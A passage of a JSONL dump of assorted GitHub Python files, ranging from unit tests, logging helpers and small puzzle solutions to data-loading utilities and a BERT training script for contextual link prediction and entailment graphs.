Record) for record in records))\n\n def test_smart_groups(self):\n for db in self.dbs:\n smart_groups = db.smart_groups\n self.assertTrue(isinstance(smart_groups, typing.Sequence))\n self.assertTrue(all(isinstance(smart_group, SmartGroup) for smart_group in smart_groups))\n\n def test_annotations_group(self):\n for db in self.dbs:\n annotations_group = db.annotations_group\n self.assertTrue(isinstance(annotations_group, Record))\n\n def test_comment(self):\n for db in self.dbs:\n comment = db.comment\n self.assertTrue(isinstance(comment, str))\n # Test the setter method\n old_comment = comment\n db.comment = \"test\"\n self.assertEqual(db.comment, \"test\")\n # Revert the change\n db.comment = old_comment\n\n def test_current_group(self):\n for db in self.dbs:\n current_group = db.current_group\n self.assertTrue(isinstance(current_group, Record))\n def test_encrypted(self):\n for db in self.dbs:\n encrypted = db.encrypted\n self.assertTrue(isinstance(encrypted, bool))\n\n def test_id(self):\n for db in self.dbs:\n id = db.id\n self.assertTrue(isinstance(id, int))\n\n def test_incoming_group(self):\n for db in self.dbs:\n incoming_group = db.incoming_group\n self.assertTrue(isinstance(incoming_group, Record))\n\n def test_name(self):\n for db in self.dbs:\n name = db.name\n self.assertTrue(isinstance(name, str))\n # Test the setter method\n old_name = name\n db.name = \"test\"\n self.assertEqual(db.name, \"test\")\n # Revert the change\n db.name = old_name\n\n def test_path(self):\n for db in self.dbs:\n path = db.path\n self.assertTrue(isinstance(path, str))\n self.assertTrue(re.match(r'^/.*\\.dtBase2$', path))\n\n def test_read_only(self):\n for db in self.dbs:\n read_only = db.read_only\n self.assertTrue(isinstance(read_only, bool))\n\n def test_root(self):\n for db in self.dbs:\n root = db.root\n self.assertTrue(isinstance(root, Record))\n\n def test_tags_group(self):\n for db in self.dbs:\n tags_group = db.tags_group\n self.assertTrue(isinstance(tags_group, Record))\n\n def test_trash_group(self):\n for db in self.dbs:\n trash_group = db.trash_group\n self.assertTrue(isinstance(trash_group, Record))\n\n def test_uuid(self):\n for db in self.dbs:\n uuid = db.uuid\n self.assertTrue(isinstance(uuid, str))\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"thekoc/devonthink-python","sub_path":"tests/test_database.py","file_name":"test_database.py","file_ext":"py","file_size_in_byte":4073,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"77"} +{"seq_id":"4942715575","text":"import datetime\n\nfrom trade.logger.logger_config import log\nfrom utils_global.dingding_message import send_dingding\n\n\ndef record_log(msg, log_type='info', send=False):\n \"\"\"\n 记录日志\n :param msg: 日志信息\n :param log_type: 日志类型\n :return:\n \"\"\"\n time_str = datetime.datetime.strftime(datetime.datetime.now(), \"%H:%M:%S\")\n log_msg = time_str + ' --> ' + msg\n print(log_msg)\n if log_type == 'info':\n log.info(msg=log_msg)\n if send:\n send_dingding(log_msg)\n\n\nif __name__ == \"__main__\":\n record_log(\"测试日志\")\n","repo_name":"ironbox1995/quantitative_trading_dev_test","sub_path":"quant_test/trade/logger/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"26207999534","text":"import json\n\nfrom diablo import db, std_commit\nfrom diablo.lib.util import utc_now\nfrom diablo.models.sis_section import SisSection\nfrom sqlalchemy import text\n\n\ndef save_mock_courses(json_file_path):\n courses = _load_mock_courses(json_file_path)\n if courses:\n for course in courses:\n section_id = course['section_id']\n if SisSection.get_course(term_id=course['term_id'], section_id=section_id):\n db.session.execute(text(f'DELETE FROM sis_sections WHERE section_id = {section_id}'))\n _save_courses(sis_sections=courses)\n std_commit(allow_test_environment=True)\n\n\ndef _load_mock_courses(json_file_path):\n with open(json_file_path, 'r') as file:\n json_ = json.loads(file.read())\n defaults = json_['defaults']\n instructors = json_['instructors']\n courses = []\n for c in json_['courses']:\n for key, value in defaults.items():\n if key not in c:\n c[key] = value\n uid = c['instructor_uid']\n if uid:\n c['instructor_name'] = instructors[uid]\n else:\n c['instructor_name'] = None\n c['instructor_role_code'] = None\n courses.append(c)\n return courses\n\n\ndef _save_courses(sis_sections):\n now = utc_now().strftime('%Y-%m-%dT%H:%M:%S+00')\n query = \"\"\"\n INSERT INTO sis_sections (\n allowed_units, course_name, course_title, created_at, deleted_at, instruction_format, instructor_name,\n instructor_role_code, instructor_uid, is_primary, meeting_days, meeting_end_date, meeting_end_time,\n meeting_location, meeting_start_date, meeting_start_time, section_id, section_num, term_id\n )\n SELECT\n allowed_units, course_name, course_title, created_at, deleted_at, instruction_format, instructor_name,\n instructor_role_code, instructor_uid, is_primary::BOOLEAN, meeting_days, meeting_end_date::TIMESTAMP,\n meeting_end_time, meeting_location, meeting_start_date::TIMESTAMP, meeting_start_time, section_id::INTEGER,\n section_num, term_id::INTEGER\n FROM json_populate_recordset(null::sis_sections, :json_dumps)\n \"\"\"\n data = [\n {\n 'allowed_units': row['allowed_units'],\n 'course_name': row['course_name'],\n 'course_title': row['course_title'],\n 'created_at': now,\n 'deleted_at': now if row.get('is_deleted') else None,\n 'instruction_format': row['instruction_format'],\n 'instructor_name': row['instructor_name'],\n 'instructor_role_code': row['instructor_role_code'],\n 'instructor_uid': row['instructor_uid'],\n 'is_primary': row['is_primary'],\n 'meeting_days': row['meeting_days'],\n 'meeting_end_date': row['meeting_end_date'],\n 'meeting_end_time': row['meeting_end_time'],\n 'meeting_location': row['meeting_location'],\n 'meeting_start_date': row['meeting_start_date'],\n 'meeting_start_time': row['meeting_start_time'],\n 'section_id': int(row['section_id']),\n 'section_num': row['section_num'],\n 'term_id': int(row['term_id']),\n } for row in sis_sections\n ]\n db.session.execute(query, {'json_dumps': json.dumps(data)})\n","repo_name":"ets-berkeley-edu/diablo","sub_path":"diablo/lib/development_db_utils.py","file_name":"development_db_utils.py","file_ext":"py","file_size_in_byte":3377,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"25165594994","text":"import sc_api as s\nimport json\nimport block\nimport cryptogr as cg\nfrom vpy.decorators import msg_handler\n\nbalances, bc, tc = {}, 0, 0\nstart = True\n\n\ndef add_task(sender, task):\n if sender == s.get_self().author:\n s.append_tasks(task)\n\n\ndef send(sender, money, to):\n if sender in balances.keys():\n if balances[sender] > money and money > 0:\n balances[sender] -= money\n balances[to] += money\n\n\ndef sell(sender, money):\n if sender in balances.keys():\n if balances[sender] >= money:\n balances[sender] -= money\n s.tnx([sender], [money])\n write()\n\n\n@msg_handler\ndef handle(sender, msg):\n if msg[0] == 'sell':\n sell(sender, msg[1])\n elif msg[0] == 'send':\n send(sender, msg[1], msg[2])\n elif msg[0] == 'add_task':\n add_task(sender, msg[1])\n\n\nbalances['0'] = 0.2\nwhile True: # IF WHILE TRUE DETECTED, IT WILL BE USED AS MAIN TASK\n if not start:\n if tc != len(s.bch[bc-1].txs):\n for tnx in s.bch[bc-1].txs[tc:len(s.bch[bc-1].txs)]:\n if 'sc' + str(ind) in tnx.outs:\n try:\n balances[tnx.author] += tnx.outns[tnx.outs.index('sc' + str(ind))]\n except:\n balances[tnx.author] = tnx.outns[tnx.outs.index('sc' + str(ind))]\n if start:\n start = False\n if bc != len(s.bch):\n for i in range(bc, len(s.bch)):\n for tnx in s.bch[i].txs:\n if 'sc' + str(ind) in tnx.outs:\n try:\n balances[tnx.author] += tnx.outns[tnx.outs.index('sc' + str(ind))]\n except:\n balances[tnx.author] = tnx.outns[tnx.outs.index('sc' + str(ind))]\n","repo_name":"hodleum/hodl","sub_path":"tests/scex.py","file_name":"scex.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"77"} +{"seq_id":"13213004899","text":"\nimport re\n\nf = open('input')\ndata = f.readlines()\n\ns = 0\n\nfor l in data:\n\n if not l or l == '\\n':\n break\n\n r = re.match('(\\d+)-(\\d+),(\\d+)-(\\d+)\\n', l)\n (l1, l2, r1, r2) = r.group(1, 2, 3, 4)\n (l1, l2, r1, r2) = (int(l1), int(l2), int(r1), int(r2))\n\n # left contained in right\n if l1 >= r1 and l2 <= r2:\n s += 1\n\n # right contained in left\n elif r1 >= l1 and r2 <= l2:\n s += 1\n\nprint(s)\n","repo_name":"rleibl/AdventOfCode2022","sub_path":"04/aoc04_part1.py","file_name":"aoc04_part1.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"4851118496","text":"# coding: utf-8\n\ndef read_file(Input):\n x=open(Input, 'r')\n Doc_lines=x.readlines()\n x.close()\n return(Doc_lines)\n\n#Concatenante V\ndef concaten(V):\n V2=''.join(V)\n #print(V2)\n return(V2)\n\n#Collect the string corresponding to tmin or tmax\ndef past_append(MinorMax, Limite, j):\n y=0\n past=[]\n if j==1:\n while MinorMax[y]!=',':\n y+=1\n y+=1\n while (MinorMax[y]!=Limite):\n past.append(MinorMax[y])\n y+=1\n #print(y)\n return(past)\n\ndef define_time(Doc_lines, string, tmax):\n i=0\n time=[]\n while i <(len(Doc_lines)-2):\n TimeA=past_append(Doc_lines[i],string,tmax)\n TimeB=concaten(TimeA)\n time.append(TimeB)\n i+=1\n return(time)\n\ndef a_ecrire(Tmax, Tmin):\n Tmax=float(Tmax)\n Tmin=float(Tmin)\n if Tmax>180 and Tmin<240:\n if Tmin<180:\n Tmin=180\n if Tmax>240:\n Tmax=240\n Insert=(str(Tmin),'Speech','1',str(Tmax))\n else:\n Insert=\"NA\"\n return(Insert)\n\ndef create_speech(tmax, tmin):\n Insert=[]\n speech=[]\n i=0\n while i> channel, patchcount_x, patchcount_y, patchsize_x, patchsize_y\n #print(\"Patches list dimension\", patches.shape, \"and size\", torch.prod(torch.tensor(patches.shape)))\n patches = patches.reshape(-1, 3, patch_size, patch_size)\n #print(\"After resize: Patches list dimension\", patches.shape)\n \n # now reading the corresponding segmentation mask of the image and extract patches\n img_name = ID.split('/')[-1]\n img_id = img_name.split('.')[0]\n mask_name = img_id + \"_mask.txt\"\n mask_path = \"/\".join(ID.split('/')[:-1]) + \"/{}\".format(mask_name)\n #print(\"Mask path is\", mask_path)\n \n # now read the mask\n if ID in self.mag20x:\n # double the mask size to 40x\n height = 2*height\n width = 2*width\n mask = np.zeros((height * width))\n j = -1 \n with open(mask_path) as file: \n for line in file: \n # print(line) \n if j >= 0: # skip first line, first line is image size \n # also binarize the mask\n mask[j] = 1 if int(line) > 0 else 0\n j += 1\n mask = mask.reshape(height, width)\n mask = torch.from_numpy(mask)\n \n #print(\"Mask: shape is\", mask.shape)\n \n # now extract patches out of the mask\n mask_patches = mask.unfold(0, patch_size, stride).unfold(1, patch_size, stride)\n #print(\"Mask: Patches list dimension\", mask_patches.shape, \"and size\", torch.prod(torch.tensor(mask_patches.shape)))\n mask_patches = mask_patches.reshape(-1, 1, patch_size, patch_size)\n #print(\"Mask: After resize: Patches list dimension\", mask_patches.shape)\n \n return [patches, mask_patches], y","repo_name":"vdhyani96/miccai_poc","sub_path":"scripts/my_classes.py","file_name":"my_classes.py","file_ext":"py","file_size_in_byte":3749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74706720568","text":"import xml.etree.ElementTree as ET\nfrom bs4 import BeautifulSoup\n\n# tree = ET.parse('xml_files/ECFR-title1.xml')\n# root = tree.getroot()\n#\n#\n# for main_child in root[1]:\n# for child in main_child1:\n# print(child)\nwith open('xml_files/ECFR-title1.xml', 'r', encoding='utf8') as f:\n read_data = f.read()\n\ndata = BeautifulSoup(read_data, \"xml\")\n\n# print(data.find_all(\"HEAD\")[0].parent.attrs)\n#\nlink_data = []\nfor title in data.find_all(\"HEAD\")[0:10]:\n print(title.parent.attrs)\n print(title)\n temp_dict = title.parent.attrs\n temp_dict['title'] = title.text\n link_data.append(temp_dict)\n # break\n# print(data_dict)\n\nprint(data.find(attrs={\"N\": \"§ 2.2\"})) # important\n\n# for title in data.find_all(\"DIV8\", {\"N\": \"§ 5.10\"}):\n# print(title.text.strip())\n\n\n# for i in range(1,21):\n# for title in data.find_all(f\"DIV{i}\")[0:10]:\n# print(title)\n# break\n# break\n","repo_name":"ForhadIsrafil/webapp-for-read-xml---load-on-html-template","sub_path":"second_project/handle_xml.py","file_name":"handle_xml.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23198621268","text":"\"\"\" Special Pythagorean triplet\nProblem 9\nA Pythagorean triplet is a set of three natural numbers, a < b < c, for which,\n\na^2 + b^2 = c^2\nFor example, 3^2 + 4^2 = 9 + 16 = 25 = 5^2.\n\nThere exists exactly one Pythagorean triplet for which a + b + c = 1000.\nFind the product abc.\n\nANSWER: 31875000\n\"\"\"\n\nimport math\n\ndef get_hypotenuse(target):\n a = 1\n b = 2\n for b in range(1, target):\n for a in range(1, b):\n c = math.sqrt(a**2 + b**2)\n # print(f'c={c}, b={b}, a={a}')\n if(a + b + c) == target:\n return int(a * b * c)\n\nprint(get_hypotenuse(1000))","repo_name":"SRFowler/project-euler-python","sub_path":"solutions/euler9.py","file_name":"euler9.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"674882735","text":"\"\"\"\nCompute QID counts.\n\nHelper function that computes a dictionary of QID -> count in training data.\n\nIf a QID is not in this dictionary, it has a count of zero.\n\"\"\"\n\nimport argparse\nimport multiprocessing\nfrom collections import defaultdict\n\nimport ujson\nfrom tqdm.auto import tqdm\n\nfrom bootleg.utils import utils\n\n\ndef parse_args():\n \"\"\"Parse args.\"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--train_file\",\n type=str,\n default=\"/dfs/scratch0/lorr1/projects/bootleg-data/data/wiki_title_0114/train.jsonl\",\n )\n parser.add_argument(\n \"--out_file\",\n type=str,\n default=\"/dfs/scratch0/lorr1/projects/bootleg-data/data/wiki_title_0114/train_qidcnt.json\",\n help=\"Regularization of each qid\",\n )\n\n args = parser.parse_args()\n return args\n\n\ndef get_counts(num_processes, file):\n \"\"\"Get true anchor slice counts.\"\"\"\n pool = multiprocessing.Pool(processes=num_processes)\n num_lines = sum(1 for _ in open(file))\n qid_cnts = defaultdict(int)\n for res in tqdm(\n pool.imap_unordered(get_counts_hlp, open(file), chunksize=1000),\n total=num_lines,\n desc=\"Gathering counts\",\n ):\n for qid in res:\n qid_cnts[qid] += res[qid]\n pool.close()\n pool.join()\n return qid_cnts\n\n\ndef get_counts_hlp(line):\n \"\"\"Get count helper.\"\"\"\n res = defaultdict(int) # qid -> cnt\n line = ujson.loads(line)\n for qid in line[\"qids\"]:\n res[qid] += 1\n return res\n\n\ndef main():\n \"\"\"Run.\"\"\"\n args = parse_args()\n print(ujson.dumps(vars(args), indent=4))\n num_processes = int(0.8 * multiprocessing.cpu_count())\n print(f\"Getting slice counts from {args.train_file}\")\n qid_cnts = get_counts(num_processes, args.train_file)\n utils.dump_json_file(args.out_file, qid_cnts)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"HazyResearch/bootleg","sub_path":"bootleg/utils/preprocessing/get_train_qid_counts.py","file_name":"get_train_qid_counts.py","file_ext":"py","file_size_in_byte":1867,"program_lang":"python","lang":"en","doc_type":"code","stars":207,"dataset":"github-code","pt":"77"} +{"seq_id":"11137769427","text":"# coding=utf-8\n# This code is adapted from Huggingface transformer's codebase\n# (https://github.com/huggingface/transformers/blob/master/examples/pytorch/multiple-choice/run_swag.py) for the\n# contextual link prediction and entailment graph learning tasks.\n\"\"\" Finetuning the library models for contextual link prediction (Bert) and using the results to build entailment graphs.\"\"\"\n\nimport argparse\nimport glob\nimport logging\nimport os\nimport random\nimport sys\n\nsys.path.append(\"..\")\nsys.path.append(\".\")\n\nimport numpy as np\nimport torch\n\nfrom sklearn.metrics import average_precision_score\nfrom torch.utils.data import DataLoader, RandomSampler, SequentialSampler, TensorDataset\nfrom torch.utils.data.distributed import DistributedSampler\nfrom tqdm import tqdm, trange\nfrom collections import defaultdict\n\nfrom transformers import (\n AdamW,\n BertTokenizer,\n get_linear_schedule_with_warmup,\n)\n\nfrom modeling_bert_contextual_link_pred import BertForEntGraphs, BertConfig\n\nfrom utils_contextual_link_pred import News_Iterable_Dataset, EntGraphAggregator, PreBuiltEntGraphCollection\n\ntry:\n from torch.utils.tensorboard import SummaryWriter\nexcept ImportError:\n from tensorboardX import SummaryWriter\n\nlogger = logging.getLogger(__name__)\n\nMODEL_CLASSES = {\n \"bert\": (BertConfig, BertForEntGraphs, BertTokenizer),\n}\n\n\ndef _simple_accuracy(preds, labels):\n return (preds == labels).mean()\n\n\ndef _set_seed(args):\n random.seed(args.seed)\n np.random.seed(args.seed)\n torch.manual_seed(args.seed)\n if args.n_gpu > 0:\n torch.cuda.manual_seed_all(args.seed)\n\n\ndef evaluate(args, model, iter_eval_dataloader, eval_dataset, eval_file, prefix=\"\", prebuilt_entgr_col=None,\n reset=False, tokenizer=None):\n # multi-gpu evaluate\n if args.n_gpu > 1 and model:\n model = torch.nn.DataParallel(model)\n\n # Computing Entailment Scores!\n logger.info(\"***** Evaluating Entailmet Scores {} *****\".format(prefix))\n # logger.info(\" Num examples = %d\", len(all_dataset))\n logger.info(\" Batch size = %d\", args.eval_batch_size)\n\n eval_loss = 0.0\n nb_eval_steps = 0\n\n preds = None\n out_labels = None\n batch_orig = None\n\n # for step, batch_orig in enumerate(tqdm_obj):\n for step in range(args.num_batches_eval):\n try:\n batch_orig = next(iter_eval_dataloader)\n except StopIteration:\n if eval_dataset.finished and reset:\n print(\"RESETTING evaluate_dataset and eval_dataloader\")\n eval_dataset = get_iterable_dataset(args, eval_dataset.entgrAgg, evaluate=True, tokenizer=tokenizer)\n iter_eval_dataloader = iter(DataLoader(eval_dataset, batch_size=args.eval_batch_size))\n batch_orig = next(iter_eval_dataloader)\n else:\n batch_orig = None\n break\n\n batch_orig = tuple(t for t in batch_orig.values())\n\n ent_scores_model = ent_scores_entgraph = None\n\n if model:\n model.eval()\n with torch.no_grad():\n batch = tuple(t.to(args.device) for t in batch_orig)\n inputs = {\n \"input_ids\": batch[0],\n \"attention_masks\": batch[1],\n \"pred_cntx_idxes\": batch[3],\n \"labels\": batch[4],\n \"label_idxes\": batch[5],\n \"pred_cntx_idxes_end\": batch[8],\n \"linear_masks\": batch[9]\n }\n\n if args.contextual_hyp:\n inputs.update({\n \"hyp_ids\": batch[10],\n \"hyp_attention_masks\": batch[11],\n \"hyp_start_idxes\": batch[12],\n \"hyp_end_idxes\": batch[13]\n })\n\n outputs = model(**inputs)\n ent_scores_model = outputs[-1]\n ent_scores_model = ent_scores_model.detach().cpu().numpy()\n\n tmp_eval_loss = outputs[0]\n eval_loss += tmp_eval_loss.mean().item()\n if prebuilt_entgr_col: # evaluating with pre-built entailment graph collection\n ent_scores_entgraph = prebuilt_entgr_col.get_ent_scores(batch_orig)\n\n if model and prebuilt_entgr_col:\n ent_scores = ent_scores_model * (1 - args.beta_comb) + args.beta_comb * ent_scores_entgraph\n elif model:\n ent_scores = ent_scores_model\n else:\n ent_scores = ent_scores_entgraph\n\n nb_eval_steps += 1\n\n print(\"current batch size: \" + str(eval_dataset.current_batch_size))\n\n ent_scores = ent_scores[:eval_dataset.current_batch_size]\n\n labels = batch_orig[4].numpy()[:eval_dataset.current_batch_size]\n\n eval_dataset.entgrAgg.set_self_score_one(ent_scores, batch_orig)\n\n if preds is None:\n preds = ent_scores\n out_labels = labels\n else:\n preds = np.append(preds, ent_scores, axis=0)\n out_labels = np.append(out_labels, labels, axis=0)\n\n print(\"eval step: \" + str(step))\n\n if batch_orig:\n if args.write_output:\n eval_dataset.entgrAgg.report_eval_scores(batch_orig, preds, eval_dataset.current_batch_size)\n eval_loss = eval_loss / nb_eval_steps\n AP = average_precision_score(out_labels, preds, average=\"samples\")\n preds[preds >= .5] = 1.0\n preds[preds < .5] = 0.0\n acc = _simple_accuracy(preds, out_labels)\n results = {\"eval_acc\": acc, \"eval_loss\": eval_loss, \"eval_AP\": AP}\n print(\"writing to eval_file\")\n eval_file.write(str(AP) + \"\\t\" + str(eval_loss) + \"\\t\" + str(\n (eval_dataset.current_batch_size) / eval_dataset.batch_size) + \"\\n\")\n eval_file.flush()\n else:\n results = None\n\n return results, iter_eval_dataloader, eval_dataset\n\n\ndef build_entgraphs(args, all_dataset, model, entgrAgg, prefix=\"\"):\n if args.entscore_mode == \"contextual\":\n args.entgraph_batch_size = args.per_gpu_batch_size * max(1, args.n_gpu)\n else:\n args.entgraph_batch_size = args.per_gpu_batch_size\n\n all_dataloader = DataLoader(all_dataset, batch_size=args.entgraph_batch_size)\n\n print(\"len(all_dataloader)\", len(all_dataloader))\n print(\"len(all_dataset)\", len(all_dataloader))\n\n # multi-gpu evaluate\n if args.n_gpu > 1 and model:\n model = torch.nn.DataParallel(model)\n\n # Computing Entailment Scores!\n logger.info(\"***** Building Entailment Graphs {} *****\".format(prefix))\n # logger.info(\" Num examples = %d\", len(all_dataset))\n logger.info(\" Batch size = %d\", args.entgraph_batch_size)\n\n eval_loss = 0.0\n nb_eval_steps = 0\n\n for step, batch_orig in enumerate(tqdm(all_dataloader, desc=\"Ent Graph Building\")):\n if model:\n model.eval()\n batch_orig = tuple(t for t in batch_orig.values())\n\n # if step == 1000:\n # break\n\n if args.entscore_mode == \"contextual\":\n\n with torch.no_grad():\n batch = tuple(t.to(args.device) for t in batch_orig)\n inputs = {\n \"input_ids\": batch[0],\n \"attention_masks\": batch[1],\n \"pred_cntx_idxes\": batch[3],\n \"labels\": None,\n \"label_idxes\": batch[5],\n \"pred_cntx_idxes_end\": batch[8],\n \"linear_masks\": batch[9]\n }\n\n outputs = model(**inputs)\n ent_scores = outputs[-1].detach().cpu()\n\n elif args.entscore_mode == \"binary\":\n ent_scores = batch_orig[4] # labels!\n else:\n raise Exception(\"not implemented!\")\n\n entgrAgg.update_entgraph(batch_orig, ent_scores)\n\n nb_eval_steps += 1\n\n eval_loss = eval_loss / nb_eval_steps\n\n print(\"eval_loss average: \", eval_loss)\n\n entgrAgg.write_graphs(args.entgraph_dir)\n\n\ndef train(args, train_dataset, eval_dataset, model, tokenizer):\n \"\"\" Train the model \"\"\"\n if args.local_rank in [-1, 0]:\n tb_writer = SummaryWriter()\n\n args.train_batch_size = args.per_gpu_batch_size * max(1, args.n_gpu)\n train_dataloader = DataLoader(train_dataset, batch_size=args.train_batch_size)\n\n eval_file = open(\"eval_\" + args.output_dir.split(\"/\")[1] + \".txt\", \"w\")\n\n iter_eval_dataloader = None\n if args.evaluate_during_training:\n args.eval_batch_size = args.per_gpu_batch_size * max(1, args.n_gpu)\n eval_dataloader = DataLoader(eval_dataset, batch_size=args.eval_batch_size)\n iter_eval_dataloader = iter(eval_dataloader)\n\n if args.max_steps > 0:\n t_total = args.max_steps\n args.num_train_epochs = args.max_steps // (len(train_dataloader) // args.gradient_accumulation_steps) + 1\n else:\n t_total = len(train_dataloader) // args.gradient_accumulation_steps * args.num_train_epochs\n\n print(\"t_total: \", t_total)\n # Prepare optimizer and schedule (linear warmup and decay)\n no_decay = [\"bias\", \"LayerNorm.weight\"]\n optimizer_grouped_parameters = [\n {\n \"params\": [p for n, p in model.named_parameters() if\n not any(nd in n for nd in no_decay) and not \"encoder.layer\" in n],\n \"weight_decay\": args.weight_decay,\n },\n {\n \"params\": [p for n, p in model.named_parameters() if\n not any(nd in n for nd in no_decay) and \"encoder.layer\" in n],\n \"weight_decay\": args.weight_decay,\n \"lr\": args.learning_rate * args.ctx_lr_ratio\n },\n {\"params\": [p for n, p in model.named_parameters() if any(nd in n for nd in no_decay)], \"weight_decay\": 0.0},\n ]\n optimizer = AdamW(optimizer_grouped_parameters, lr=args.learning_rate, eps=args.adam_epsilon)\n scheduler = get_linear_schedule_with_warmup(\n optimizer, num_warmup_steps=args.warmup_steps, num_training_steps=t_total\n )\n if args.fp16:\n try:\n from apex import amp\n except ImportError:\n raise ImportError(\"Please install apex from https://www.github.com/nvidia/apex to use fp16 training.\")\n model, optimizer = amp.initialize(model, optimizer, opt_level=args.fp16_opt_level)\n\n # multi-gpu training (should be after apex fp16 initialization)\n if args.n_gpu > 1:\n model = torch.nn.DataParallel(model)\n\n # Distributed training (should be after apex fp16 initialization)\n if args.local_rank != -1:\n model = torch.nn.parallel.DistributedDataParallel(\n model, device_ids=[args.local_rank], output_device=args.local_rank, find_unused_parameters=True\n )\n\n # Train!\n logger.info(\"***** Running training *****\")\n logger.info(\" Num examples = %d\", len(train_dataset))\n logger.info(\" Num Epochs = %d\", args.num_train_epochs)\n logger.info(\" Instantaneous batch size per GPU = %d\", args.per_gpu_batch_size)\n logger.info(\n \" Total train batch size (w. parallel, distributed & accumulation) = %d\",\n args.train_batch_size\n * args.gradient_accumulation_steps\n * (torch.distributed.get_world_size() if args.local_rank != -1 else 1),\n )\n logger.info(\" Gradient Accumulation steps = %d\", args.gradient_accumulation_steps)\n logger.info(\" Total optimization steps = %d\", t_total)\n\n global_step = 0\n tr_loss, logging_loss = 0.0, 0.0\n best_dev_acc = 0.0\n best_steps = 0\n model.zero_grad()\n train_iterator = trange(int(args.num_train_epochs), desc=\"Epoch\", disable=args.local_rank not in [-1, 0])\n _set_seed(args) # Added here for reproductibility\n for epoch in train_iterator:\n epoch_iterator = tqdm(train_dataloader, desc=\"Iteration\", disable=args.local_rank not in [-1, 0])\n for step, batch in enumerate(epoch_iterator):\n model.train()\n batch = tuple(t.to(args.device) for t in batch.values())\n inputs = {\n \"input_ids\": batch[0],\n \"attention_masks\": batch[1],\n \"pred_cntx_idxes\": batch[3],\n \"labels\": batch[4],\n \"label_idxes\": batch[5],\n \"pred_cntx_idxes_end\": batch[8],\n \"linear_masks\": batch[9]\n }\n\n if args.contextual_hyp:\n inputs.update({\n \"hyp_ids\": batch[10],\n \"hyp_attention_masks\": batch[11],\n \"hyp_start_idxes\": batch[12],\n \"hyp_end_idxes\": batch[13]\n })\n\n outputs = model(**inputs)\n loss = outputs[0] # model outputs are always tuple in contextual_link_pred (see doc)\n\n if args.n_gpu > 1:\n loss = loss.mean() # mean() to average on multi-gpu parallel training\n if args.gradient_accumulation_steps > 1:\n loss = loss / args.gradient_accumulation_steps\n\n if args.fp16:\n with amp.scale_loss(loss, optimizer) as scaled_loss:\n scaled_loss.backward()\n torch.nn.utils.clip_grad_norm_(amp.master_params(optimizer), args.max_grad_norm)\n else:\n loss.backward()\n torch.nn.utils.clip_grad_norm_(model.parameters(), args.max_grad_norm)\n\n if step % 10 == 0:\n print(\"loss: \", loss)\n\n tr_loss += loss.item()\n if (step + 1) % args.gradient_accumulation_steps == 0:\n\n optimizer.step()\n scheduler.step() # Update learning rate schedule\n model.zero_grad()\n global_step += 1\n\n if args.local_rank in [-1, 0] and args.logging_steps > 0 and global_step % args.logging_steps == 0:\n # Log metrics\n if (\n args.local_rank == -1 and args.evaluate_during_training\n ): # Only evaluate when single GPU otherwise metrics may not average well\n results, iter_eval_dataloader, eval_dataset = evaluate(args, model, iter_eval_dataloader,\n eval_dataset, eval_file, reset=True)\n for key, value in results.items():\n print(\"eval_{}\".format(key), value, global_step)\n\n if args.local_rank in [-1, 0] and args.save_steps > 0 and global_step % args.save_steps == 0:\n # Save model checkpoint\n output_dir = os.path.join(args.output_dir, \"checkpoint-{}\".format(global_step))\n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n model_to_save = (\n model.module if hasattr(model, \"module\") else model\n ) # Take care of distributed/parallel training\n model_to_save.save_pretrained(output_dir)\n tokenizer.save_vocabulary(output_dir)\n torch.save(args, os.path.join(output_dir, \"training_args.bin\"))\n logger.info(\"Saving model checkpoint to %s\", output_dir)\n\n if step % 100 == 0:\n print(\"learning rates:\")\n for param_group in optimizer.param_groups:\n print(param_group[\"lr\"])\n\n if args.max_steps > 0 and global_step > args.max_steps:\n epoch_iterator.close()\n break\n if args.max_steps > 0 and global_step > args.max_steps:\n train_iterator.close()\n break\n\n print(\"EPOCH COMPLETED\" + str(epoch))\n\n if epoch < args.num_train_epochs:\n print(\"RESETTING train_dataset and train_dataloader\")\n train_dataset = get_iterable_dataset(args, train_dataset.entgrAgg, evaluate=False, tokenizer=tokenizer)\n train_dataloader = DataLoader(train_dataset, batch_size=args.train_batch_size)\n\n if args.local_rank in [-1, 0]:\n tb_writer.close()\n\n return global_step, tr_loss / global_step, best_steps\n\n\ndef get_iterable_dataset(args, entgrAgg, all=False, evaluate=False, test=False, tokenizer=None):\n if args.local_rank not in [-1, 0]:\n torch.distributed.barrier() # Make sure only the first process in distributed training process the dataset, and the others will use the cache\n\n # Load data features from cache or dataset file\n if all:\n data_mode = \"all\"\n elif evaluate:\n data_mode = \"dev\"\n elif test:\n data_mode = \"test\"\n else:\n data_mode = \"train\"\n assert not (evaluate and test)\n input_path = args.input_path\n\n if args.entscore_mode == \"contextual\":\n args.batch_size = args.per_gpu_batch_size * max(1, args.n_gpu)\n else:\n args.batch_size = args.per_gpu_batch_size\n dataset = News_Iterable_Dataset(\n input_path, entgrAgg, data_mode, args.batch_size, args.preferred_num_labels, args.neg_ratio,\n args.max_seq_length, args.num_examples, args.mask_ents_prob, tokenizer, args.contextual_hyp, args.hard_negs,\n args.process_idx, args.num_processes, args.updated_len_loader, args.no_argord, args.triple_count_path)\n return dataset\n\n\ndef main():\n parser = argparse.ArgumentParser()\n\n # Required parameters\n parser.add_argument(\n \"--input_path\",\n default=None,\n type=str,\n required=True,\n help=\"The input data path. It should contain the json file containing the parsed triple mentions and their\"\n \"contexts.\",\n )\n\n parser.add_argument(\n \"--trels_folder\",\n default=None,\n type=str,\n required=True,\n help=\"The input trels folder: For each 